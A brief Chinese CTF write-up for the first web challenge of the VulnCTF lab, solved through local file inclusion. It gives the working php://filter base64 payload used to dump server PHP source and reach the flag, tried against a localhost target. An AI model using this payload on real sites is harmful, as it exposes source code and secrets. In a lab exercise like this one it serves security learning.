0
点赞
收藏
分享

微信扫一扫

VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】


项目地址:https://github.com/jianmou/VulnCTF

============================

个人收获:

1.利用PHP内置协议直接读取网页代码

 

==============================

 

 

题目:

VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】_php

 

我们查看下网页源码

VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】_2d_02

通过代码发现是文件包含。

 

我们把url改为http://localhost/vulnctf/web/challenges/abf20c91a442da48/index.php并加上?page=

然后我们试着访问

http://localhost/vulnctf/web/challenges/abf20c91a442da48/index.php?page=Y29uZmln.php

 

VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】_搜索_03

出来的是phpinfo的页面,搜索关键词flag和查看网页源码也没有什么发现

 

那么我们利用伪协议读取下网页的源码看看有什么线索

 

http://localhost/vulnctf/web/challenges/abf20c91a442da48/index.php?page=php://filter/read=convert.base64-encode/resource=Y29uZmln.php

得到如下结果

VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】_php_04

 

去网上进行base64解密

VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】_php_05

 

得到flag

 

举报

相关推荐

0 条评论